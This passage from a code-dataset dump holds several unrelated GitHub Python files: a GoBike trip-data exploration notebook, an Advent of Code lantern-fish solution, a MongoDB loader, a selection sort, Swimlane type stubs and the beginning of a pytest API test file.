\n# > 7. 'San Francisco Ferry Building (Harry Bridges Plaza)', \n# > 8. 'Howard St at Beale St', \n# > 9. 'Steuart St at Market St', \n# > 10. 'Powell St BART Station (Market St at 5th St)'\n# \n# > The duration for complete trip and age were skewed to the right. To correct this, i performed a log transformation on these variables and found out that most trips were completed in 8 to 12 minutes range, while the average age of most riders was around 30. Weekdays tend to be the favourite days for riders with Thursday and Tuesday having the most trips, while mondays have least trips for weekdays. This needs to be investigated further. Riders make the most trip during the morning and afternoon hours of the day. This should be as a result of working hours duration. Night appears to be the period with least rides. For Users, males have the most trip than female and other. Subcribers tend to have the most trip than customers.\n# \n# ### Of the features you investigated, were there any unusual distributions? Did you perform any operations on the data to tidy, adjust, or change the form of the data? If so, why did you do this?\n# \n# > There were 183412 data present in the dataset with 16 columns. The dataset was a bit dirty and messy. \n# > 1. There was year of birth present instead of age. I performed a lambda arithmetic operation on the column series and created a new age column for the dataset. \n# > 2. From the start time column, I extracted the month, Day of the weeks, and time of the day into different columns. \n# > 3. The month extracted from start time column happens to be February. \n# > 4. The time duration for a complete ride was presented in seconds which was not clear enough. The least time duration was 61 seconds which is a 1.1minutes duration. I converted the duration to minutes which is a proper representation of seconds.\n# > 5. Columns that we will not be working with for our analysis were discarded including the month column\n# > 6. There were some missing data in our datasets too. The rows containing these missing data were dropped.\n# > 7. Erroneous data type was addressed too.\n\n# ## Bivariate Exploration\n\n# In[53]:\n\n\n# correlation matrices for numerical variables \nsb.heatmap(gobike10.corr(), annot = True, fmt = '.2f', cmap = 'rocket_r', center = 0)\nplt.title('Correlation Matrices for Numerical Variables');\n\n\n# In[54]:\n\n\n# relationship between duration and age\nsb.regplot(data = gobike10, x = 'age', y = 'duration_mins', fit_reg = False, scatter_kws = {'alpha': 1/2});\n\n\n# In[55]:\n\n\ndef log_trans(x, inverse = False):\n \"\"\" Transformation Helper Function \"\"\"\n if not inverse:\n return np.log10(x)\n else:\n return np.power(10, x)\n\n\n# In[56]:\n\n\n# log transformation for both age and duration\nplt.figure(figsize = (7, 5))\ngobike10['log_age'] = gobike10['age'].apply(log_trans)\nsb.regplot(data = gobike10, x = 'log_age', y = 'duration_mins', fit_reg = False, scatter_kws = {'alpha': 1/500})\nplt.yscale('log')\nxtick = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xtick]\nplt.xticks(log_trans(xtick), label)\nytick = [0.08, 0.2, 0.5, 1, 2, 4, 8, 16, 30, 50, 90, 200]\nplt.yticks(ytick, ytick)\nplt.title('Relationship between Duration and Age')\nplt.xlabel('Age')\nplt.ylabel('Duration (mins)');\n\n\n# From the correlation matrices for numerical variables, age and duration have a slight negative correlation. Most riders were around age greater than 20 and less than 40. this put it at an average of around 30 years. The time duration for this age was around 10 minutes.\n\n# In[57]:\n\n\n# plot for station and age\nplt.figure(figsize = (10, 5))\nsb.violinplot(data = gobike10, x = 'age', y = 'start_station_name', color = colour, inner = 'quartile', order = ordr)\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Relationship between Station and Age')\nplt.xlabel('Age')\nplt.ylabel('Station names');\n\n\n# Age have a median of around 30 years for all top 10 station location. This further shows that the majority of riders around workable age of 30.\n\n# In[58]:\n\n\n# plot for station and duration\nplt.figure(figsize = (10, 5))\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'start_station_name', color = colour, order = ordr)\nplt.xscale('log')\nplt.xlabel('Duration (mins)');\nticker = [0.08, 5, 10, 20, 100, 1000]\nplt.xticks(ticker, ticker)\nplt.title('Relationship between Station and Duration')\nplt.ylabel('Station names');\n\n\n# Duration have a median of around 10 minutes for all top 10 station location. This corresponds to our earlier plot on the duration of riders.\n\n# In[59]:\n\n\n# relationship between station and day of the week\nplt.figure(figsize = (10, 10))\n\nplt.subplot(2, 1, 1)\ncat_count = gobike10.groupby(['start_station_name', 'start_day']).size()\ncat_count = cat_count.reset_index(name = 'count').pivot(index = 'start_station_name', columns = 'start_day', values = 'count')\nsb.heatmap(cat_count, annot = True, fmt = '.1f')\nplt.title('HeatMap showing Relationship between Station and Day of the Week')\nplt.xlabel('Day of the week')\nplt.ylabel('Station names')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.title('Plot showing Relationship between Station and Day of the Week')\nplt.ylabel('Station names');\n\n\n# In all 10 locations, weekdays have most rides than weekends. Among the weekdays, thursday and tuesday have the most trips, while monday have the least trip. What could be the reason behind this? Unlike the former distribution of station plot that made Market St at 10th St the station with the most rides, this plot gives a better insight. San Francisco Caltrain Station 2 (Townsend St at 4th St) and Market St at 10th St have the most ride for weekdays, but Market St at 10th St have most rides for weekends as well as Powell St BART Station (Market St at 4th St). \n\n# In[60]:\n\n\n# relationship between station and time of the day\nplt.figure(figsize = (10, 10))\n\nplt.subplot(2, 1, 1)\ncat_count = gobike10.groupby(['start_station_name', 'day_period']).size()\ncat_count = cat_count.reset_index(name = 'count').pivot(index = 'start_station_name', columns = 'day_period', values = 'count')\nsb.heatmap(cat_count, annot = True, fmt = '.1f');\nplt.title('HeatMap showing Relationship between Station and Time of the Day')\nplt.xlabel('Time of the day')\nplt.ylabel('Station names')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.title('Plot showing Relationship between Station and Time of the Day')\nplt.ylabel('Station names');\n\n\n# Morning and Afternoon have the most ride for the top 10 stations. San Francisco Caltrain Station 2 (Townsend St at 4th St) have the most ride for morning. This is different for Market St at 10th St that have almost equal rides for both afternoon and morning period.\n\n# In[61]:\n\n\n# relationship between station and gender\nplt.figure(figsize=(10,6))\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'member_gender', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Plot showing Relationship between Station and Gender')\nplt.ylabel('Station names');\n\n\n# Across all top 10 station, male have most rides than female. From our earlier plot on the distribution of gender, we still haven't figured out why the male gender are more than the female.\n\n# In[62]:\n\n\n# relationship between station and user type\nplt.figure(figsize=(10,6))\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'user_type', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Plot showing Relationship between Station and User Type')\nplt.ylabel('Station names');\n\n\n# Subscribers tends to have more rides than customers. Market St at 10th St have the most suscribers.\n\n# In[63]:\n\n\n# relationship plot between time and age\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and Age')\n\nplt.subplot(1, 2, 1)\nsb.violinplot(data = gobike10, x = 'age', y = 'start_day', color = colour, inner = 'quartile')\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Day of the week and Age')\nplt.ylabel('Day of the week')\nplt.xlabel('Age');\n\nplt.subplot(1, 2, 2)\nsb.violinplot(data = gobike10, x = 'age', y = 'day_period', color = colour, inner = 'quartile')\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Time of the Day and Age')\nplt.ylabel('Time of the day')\nplt.xlabel('Age');\n\n\n# The median age for most riders during the weekdays are slightly higher than those of weekends, but they are still around the range of 30. This shows that more younger people ride during the weekends. This further proves the age of most riders to be around 30. \n\n# In[64]:\n\n\n# plot of user type against time\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and User Type')\n\nplt.subplot(1, 2, 1)\nsb.countplot(data = gobike10, y = 'start_day', hue = 'user_type')\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Day of the week and User Type')\nplt.ylabel('Day of the week');\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, y = 'day_period', hue = 'user_type')\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Time of the Day and User Type')\nplt.ylabel('Time of the day');\n\n\n# Subcribers tend to ride mostly on thursday and tuesdays. what is happening on thurdays and tuesdays? We need to investigate further. Morning hours also have the most ride for subscribers, while afternoon hours have most ride for customers. \n\n# In[65]:\n\n\n# plot of gender and time\nplt.figure(figsize = (22, 6))\nplt.suptitle('Plot showing Relationship between Time and Gender')\n\nplt.subplot(1, 2, 1)\nsb.countplot(data = gobike10, y = 'start_day', hue = 'member_gender')\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Day of the week and Gender')\nplt.ylabel('Day of the week');\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, y = 'day_period', hue = 'member_gender')\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Time of the day and Gender')\nplt.ylabel('Time of the day');\n\n\n# This also confirms earlier plot that male have more rides than females and others and they have most rides in the morning hours.\n\n# In[66]:\n\n\n# plot between time and duration\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and Duration')\n\nplt.subplot(1, 2, 1)\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'start_day', color = colour)\nplt.xscale('log')\nticker = [0.08, 10, 100, 1000]\nplt.xticks(ticker, ticker)\nplt.title('Day of the week and Duration')\nplt.ylabel('Day of the week')\nplt.xlabel('Duration (mins)');\n\nplt.subplot(1, 2, 2)\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'day_period', color = colour)\nplt.xscale('log')\nticker = [0.08, 10, 100, 1000]\nplt.xticks(ticker, ticker);\nplt.title('Time of the day and Duration')\nplt.ylabel('Time of the day')\nplt.xlabel('Duration (mins)');\n\n\n# From our plot, weekends have the longest duration of rides than weekdays. Afternoon and night also have longer duration of rides than morning\n\n# ### Talk about some of the relationships you observed in this part of the investigation. How did the feature(s) of interest vary with other features in the dataset?\n# \n# > Age of riders for the Top 10 stations have a median of around 30. This further shows that the majority of riders are around workable age of 30.\n# \n# > Duration have a median of around 10 minutes for all top 10 station location. This corresponds to our earlier plot on the duration of riders\n# \n# > In all 10 locations, weekdays have most rides than weekends. Among the weekdays, thursday and tuesday have the most trips, while monday have the least trip. Unlike the former distribution of station plot that made Market St at 10th St the station with the most rides, this plot gives a better insight. San Francisco Caltrain Station 2 (Townsend St at 4th St) and Market St at 10th St have the most ride for weekdays, especially thursdays and tuesdays, but Market St at 10th St have most rides for weekends which i believe could be as a result of tourist presence. This could suggest that Market St at 10th St have much more attractive sites than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n# \n# > Morning and Afternoon have the most ride for the top 10 stations. San Francisco Caltrain Station 2 (Townsend St at 4th St) have the most ride for morning. This is different for Market St at 10th St that have almost equal rides for both afternoon and morning period. This further strengthens our assumption on Market St at 10th St been made up of employees and tourists.\n# \n# > Male have most rides than female. \n# \n# > Subscribers tends to have more rides than customers. Market St at 10th St have the most suscribers.\n# \n# > The median age for most riders during the weekdays are slightly higher than those of weekends, but they are still around the range of 30. This shows that more younger people ride during the weekends. This further proves the age of most riders to be around 30.\n# \n# > Subcribers tend to ride mostly on thursday and tuesdays. what is happening on thurdays and tuesdays? We need to investigate further. Morning hours also have the most ride for subscribers, while afternoon hours have most ride for customers.\n# \n# > Male have more rides than females and others and they have most rides in the morning hours.\n# \n# > Weekends have the longest duration of rides than weekdays. Afternoon and night also have longer duration of rides than morning\n# \n# ### Did you observe any interesting relationships between the other features (not the main feature(s) of interest)?\n# \n# > There was a negative relationship between age and duration. Riders with age average of 30 have the most rides with duration of around 10 minutes.\n\n# ## Multivariate Exploration\n\n# In[67]:\n\n\n# create a subset of individual gender and user type to investigate time and station location\ngobike_m = gobike10.query('member_gender == \"Male\"') \ngobike_f = gobike10.query('member_gender == \"Female\"')\ngobike_o = gobike10.query('member_gender == \"Other\"')\ngobike_s = gobike10.query('user_type == \"Subscriber\"')\ngobike_c = gobike10.query('user_type == \"Customer\"')\n\n\n# In[68]:\n\n\n# plot of gender with station name and day of the week\nplt.figure(figsize = (12, 22))\n\nplt.subplot(3, 1, 1)\nsb.countplot(data = gobike_m, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Male')\n\nplt.subplot(3, 1, 2)\nsb.countplot(data = gobike_f, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Female')\n\nplt.subplot(3, 1, 3)\nsb.countplot(data = gobike_o, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Other');\n\n\n# Weekdays have most riders than than Weekends for both male, female and other with thursday and tuesday having the highest ride count. Market St at 10th St have most rides for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n\n# In[69]:\n\n\n# plot of gender with station name and time of the day\nplt.figure(figsize = (12, 20))\n\nplt.subplot(3, 1, 1)\nsb.countplot(data = gobike_m, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Male')\n\nplt.subplot(3, 1, 2)\nsb.countplot(data = gobike_f, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Female')\n\nplt.subplot(3, 1, 3)\nsb.countplot(data = gobike_o, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Time of the Day by Other');\n\n\n# Morning and Afternoon have the most ride for all gender\n\n# In[70]:\n\n\n# plot of user type with station name and day of the week\nplt.figure(figsize = (12, 14))\n\nplt.subplot(2, 1, 1)\nsb.countplot(data = gobike_s, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Day of the Week by Subscriber')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike_c, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Customer');\n\n\n# Subscribers have more rides for weekdays than weekends. This suggest that subcribers are made up of residents/employees. Customers on the other hand, have weekends trips much more than the weekdays. This suggest that customers are highly made up of tourists/visitors. San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers. This location appears to be the most attrative site for tourist.\n\n# In[71]:\n\n\n# plot of user type with station name and time of the day\nplt.figure(figsize = (12, 14))\n\nplt.subplot(2, 1, 1)\nsb.countplot(data = gobike_s, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Subscriber')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike_c, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Time of the Day by Customer');\n\n\n# Subscriber and customer have most trip for both morning and afternoon.\n\n# In[72]:\n\n\n# does age and duration determine when riders make trip? We will be using station id instead of station name for our FacetGrid plot \nprint(gobike10.groupby('start_station_name')['start_station_id'].value_counts())\norder = gobike10.start_station_id.value_counts().index\n\n\n# In[73]:\n\n\n# plot of the age by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'start_day', col_wrap = 3)\ng.map(sb.violinplot, 'start_station_id', 'age', order = order, color = colour, inner = 'quartile');\nplt.yscale('log');\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Age and Station by Day of the Week');\n\n\n# The relationship between age and station by day of the week have a median of around 30 years. This is not different from our earlier discovery\n\n# In[74]:\n\n\n# plot of the age by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'day_period', col_wrap = 3)\ng.map(sb.violinplot, 'start_station_id', 'age', order = order, color = colour, inner = 'quartile')\nplt.yscale('log')\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.yticks(ticker, ticker);\n\n\n# The relationship between age and station by time of the day also have a median of around 30 years. \n\n# In[75]:\n\n\n# plot of the duration by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week');\n\n\n# The relationship between duration and station by day of the week shows that weekends have the longest duration for a complete trip. Weekdays still maintains 10 minutes as depicted on our earlier plot\n\n# In[76]:\n\n\n# plot of the duration by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration for morning and afternoon have a median of around 10 minutes, but night riders tend to have a longer ride duration than morning and afternoon. Why is that so? Lets investigate further.\n\n# In[77]:\n\n\n# plot of the duration of subscribers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_s, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week for Subscribers');\n\n\n# Duration of subscribers trips by day of the week lies around 10mins for weekdays and a slight increase for weekends\n\n# In[78]:\n\n\n# plot of the duration of subscribers trips by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike_s, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration of subscribers trips by time of the day shows that subscribers have a longer trip at night\n\n# In[79]:\n\n\n# plot of the duration of customers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_c, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week for Customers');\n\n\n# Duration of customers trips by day of the week tends to be above 10mins for both weekdays and weekends\n\n# In[80]:\n\n\n# plot of the duration of customers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_c, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration of customers trips by time of the day shows that customers have a longer trip at night\n\n# ### Talk about some of the relationships you observed in this part of the investigation. Were there features that strengthened each other in terms of looking at your feature(s) of interest?\n# \n# > Plotting station location, time and riders characteristics (gender) gave more insights on station location. Market St at 10th St and San Francisco Caltrain Station 2 (Townsend St at 4th St) were ranked top two stations having the most traffic of over three thousand rides, with weekdays having the most rides than weekends. Comparing Market St at 10th St and San Francisco Caltrain Station 2 (Townsend St at 4th St) weekend rides showed that Market St at 10th St have most trips for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n# \n# > Plotting station location, time and riders characteristics (user type) shows that subscribers have most rides for weekdays than weekends. Customers on the other hand have most rides on weekends than weekdays. This could justify our assumption that subscribers are mostly made up of employees or residents in that area, while customers may just be visitors or tourist visiting the location. For our all top 10 station location, San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers. This location seems to be the most attrative site for tourist.\n# \n# ### Were there any interesting or surprising interactions between features?\n# \n# > The relationship between duration and station location by time shows that weekends have the longest duration for a complete trip. Weekdays still maintains 10 minutes duration. Night riders tend to have a longer ride duration than morning and afternoon. Investigating further with user type shows that duration of subscribers trips by day of the week lies around 10mins for weekdays and a slight increase for weekends, this is not the same for customers having trips which duration tend to be above 10mins for both weekdays and weekends. For both user type, night period always have longer duration.\n\n# ## Conclusions\n# > Subscribers have most rides for weekdays than weekends. Customers on the other hand have most rides on weekends than weekdays. Of the top 2 station locations, Market St at 10th St have most trips for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St), while for our all top 10 station location, San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers.\n# \n# > Duration of trip for customers is longer than that of subscribers for every day of the week and time of the day.\n","repo_name":"macQaries/Ford-GoBike-System-Data","sub_path":"Ford_GoBike_System_Data_Part1.py","file_name":"Ford_GoBike_System_Data_Part1.py","file_ext":"py","file_size_in_byte":43115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43045981891","text":"from collections import defaultdict, deque\nimport time\n\"\"\"\nDetermine the number of Lantern Fish that will exist after a given number of days.\nLantern fish give birth every 7 days.\n\nThe input represents each fish's reproduction timer, which counts down from 6 to 0.\nWhen it reaches 0, the fish produces another fish with a timer value of eight (it takes\n2 days to begin its 7-day reproduction cycle), and its own timer is reset to 6.\n\nPart 1: Find the number of fish after 80 days.\n\nPart 2: FInd the number of fish after 256 days.\n\"\"\"\n\nfrom collections import defaultdict\n\ndata = open('2021/data/day06').readlines()[0].split(',')\ndays = [80, 256]\n\nfor part in [0, 1]:\n start = time.time()\n fish = map(lambda x: int(x), data)\n\n d = deque([0]*9)\n for f in fish: d[f]+= 1\n\n for day in range(days[part]):\n v = d.popleft()\n d.append(v)\n d[6]+= v\n\n # Slower solution (my original) usig dict keys instead of a circular buffer \n # d = defaultdict(int)\n # for f in fish: d[f]+= 1\n\n # for day in range(days[part]):\n # zeros = None\n # for k, v in sorted(d.items()):\n # if k == 0:\n # zeros = v\n # else:\n # d[k-1]+= v\n # del d[k]\n # if zeros is not None:\n # d[6]+= zeros\n # d[8]+= zeros\n # d[0]-= zeros\n\n # print('Part %d: %d Time: %d secs' % (part+1, sum(d.values()), time.time() - start))\n print('Part %d: %d Time: %d secs' % (part+1, sum(d), time.time() - start))\n\n\n# Part 1: 359344\n# Part 2: 1629570219571\n","repo_name":"MidnightJava/adventOfCode","sub_path":"AocPython/src/myAoc/2021/Day06.py","file_name":"Day06.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41650154190","text":"\"\"\"\n---------\nloader.py\n---------\n\nA minimal code to store data in MongoDB\n\"\"\"\nimport csv\nimport json\nfrom datetime import datetime\nfrom pymongo import MongoClient\n\n\ndef load_orders():\n \"\"\"Load orders sample data\"\"\"\n client = MongoClient('localhost', 27017)\n orders = client[\"orders\"]\n\n # insert customers data\n customers = orders[\"customers\"]\n\n with open('customers.csv') as csvfile:\n customers_data = list(csv.DictReader(csvfile))\n\n _ = customers.insert_many(customers_data)\n\n # insert items data\n items_ordered = orders[\"items_ordered\"]\n\n with open('items_ordered.csv') as csvfile:\n items_ordered_data = list(csv.DictReader(csvfile))\n\n _ = items_ordered.insert_many(items_ordered_data)\n\n\ndef load_airbnb():\n \"\"\"Load AirBnB sample data\"\"\"\n client = MongoClient('localhost', 27017)\n airbnb = client[\"airbnb\"]\n sample_data = airbnb[\"sample_data\"]\n\n with open(\"airbnb.json\", \"r\") as f_in:\n data = json.load(f_in)\n\n for d in data:\n for key, val in d.items():\n if isinstance(val, dict):\n if \"$date\" in val.keys():\n d[key] = datetime.fromtimestamp(val[\"$date\"] / 1000)\n elif \"$numberDecimal\" in val.keys():\n d[key] = val[\"$numberDecimal\"]\n try:\n sample_data.insert(d)\n except:\n pass\n\n\ndef main():\n \"\"\"The main script\"\"\"\n load_airbnb()\n load_orders()\n\n\nif __name__ == \"__main__\":\n main()\n print(\"Done!\")\n","repo_name":"enel-gdh-educational/katacoda-scenarios","sub_path":"mongodb/assets/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"38805874620","text":"def selectionSort(array, size):\r\n for step in range(size):\r\n min_idx = step\r\n for i in range(step + 1, size):\r\n # select the minimum element in each loop\r\n if array[i] < array[min_idx]:\r\n min_idx = i\r\n # put min at the correct position\r\n (array[step], array[min_idx]) = (array[min_idx], array[step])\r\n\r\n\r\nif __name__ == '__main__':\r\n list=[]\r\n n = int(input(\"Enter number of elements : \"))\r\n for i in range(0, n):\r\n ele = int(input())\r\n list.append(ele)\r\nsize = len(list)\r\nprint(list)\r\nselectionSort(list, size)\r\nprint('Sorted Array in Ascending Order:')\r\nprint(list)# Selection sort in Python","repo_name":"Surya-prathamzzz/LP2","sub_path":"assign03.py","file_name":"assign03.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29972484971","text":"from typing import Literal, Union\r\n\r\n# Filter\r\nEQ: Literal[\"equals\"]\r\nNOT_EQ: Literal[\"doesNotEqual\"]\r\nCONTAINS: Literal[\"contains\"]\r\nEXCLUDES: Literal[\"excludes\"]\r\nGT: Literal[\"greaterThan\"]\r\nLT: Literal[\"lessThan\"]\r\nLTE: Literal[\"lessThanOrEqual\"]\r\nGTE: Literal[\"greaterThanOrEqual\"]\r\n\r\nFilterSearchType = Union[\r\n Literal[\"equals\"],\r\n Literal[\"doesNotEqual\"],\r\n Literal[\"contains\"],\r\n Literal[\"excludes\"],\r\n Literal[\"greaterThan\"],\r\n Literal[\"lessThan\"],\r\n Literal[\"lessThanOrEqual\"],\r\n Literal[\"greaterThanOrEqual\"],\r\n]\r\n\r\n# Aggregate\r\nAVG: Literal[\"average\"]\r\nCOUNT: Literal[\"count\"]\r\nSUM: Literal[\"sum\"]\r\nMIN: Literal[\"min\"]\r\nMAX: Literal[\"max\"]\r\n\r\nAggregateSearchType = Union[Literal[\"average\"], Literal[\"count\"], Literal[\"sum\"], Literal[\"min\"], Literal[\"max\"]]\r\n\r\n# GroupBy\r\nGB: Literal[\"groupBy\"]\r\nHOUR: Literal[\"groupByHour\"]\r\nDAY: Literal[\"groupByDay\"]\r\nWEEK: Literal[\"groupByWeek\"]\r\nMONTH: Literal[\"groupByMonth\"]\r\nQUARTER: Literal[\"groupByQuarter\"]\r\nYEAR: Literal[\"groupByYear\"]\r\n\r\nGroupBySearchType = Union[\r\n Literal[\"groupBy\"],\r\n Literal[\"groupByHour\"],\r\n Literal[\"groupByDay\"],\r\n Literal[\"groupByWeek\"],\r\n Literal[\"groupByMonth\"],\r\n Literal[\"groupByQuarter\"],\r\n Literal[\"groupByYear\"],\r\n]\r\n\r\n# Sorts\r\nASC: Literal[\"ascending\"]\r\nDESC: Literal[\"descending\"]\r\n\r\nSortSearchType = Union[Literal[\"ascending\"], Literal[\"descending\"]]\r\n","repo_name":"SoftcatMS/swimlane-stubs","sub_path":"swimlane-stubs/core/search.pyi","file_name":"search.pyi","file_ext":"pyi","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28934319904","text":"import pytest\nimport openpyxl\nimport requests\nimport json\nfrom jsonpath_ng import jsonpath, parse\n\n'''\nThis routine loads the data from excel file as List of Dictionary. \n'''\n\n\ndef get_data(test_type):\n\n if test_type == 'smoke':\n data_sheet = \"Smoke\"\n elif test_type == 'regression':\n data_sheet = \"Regression\"\n else:\n data_sheet = \"Functional\"\n\n book = openpyxl.load_workbook(\"Data.xlsx\")\n sheet = book[data_sheet]\n testcases=[]\n for row in range(2,sheet.max_row+1):\n test={}\n for column in range(1, sheet.max_column+1):\n test[sheet.cell(row=1,column=column).value]=sheet.cell(row=row,column=column).value # adding as dict\n testcases.append(test)\n return testcases\n\n\n'''\nBelow is the test that runs 'n' number of times based on the number of lines on the spreadsheet.\n'''\n\n\n@pytest.mark.smoke\n@pytest.mark.parametrize('tests',get_data(\"smoke\"))\ndef test_return_code(tests):\n\n response = requests.get(tests['url'])\n assert response.status_code == tests['return_code']\n\n\n@pytest.mark.regression\n@pytest.mark.parametrize('tests',get_data(\"regression\"))\ndef test_regression(tests):\n response = requests.get(tests['url'])\n response_body = json.loads(response.text)\n assert response_body == json.loads(tests['expected']) # comparing the API response vs expected JSON from excel.\n\n\n@pytest.mark.functional\n@pytest.mark.parametrize('tests', get_data(\"functional\"))\ndef test_functional(tests):\n global response\n if tests['url'] != None:\n response = requests.get(tests['url'])\n else:\n response_body = json.loads(response.text)\n jsonpath_expression = parse(tests['Jpath'])\n for match in jsonpath_expression.find(response_body):\n assert match.value == 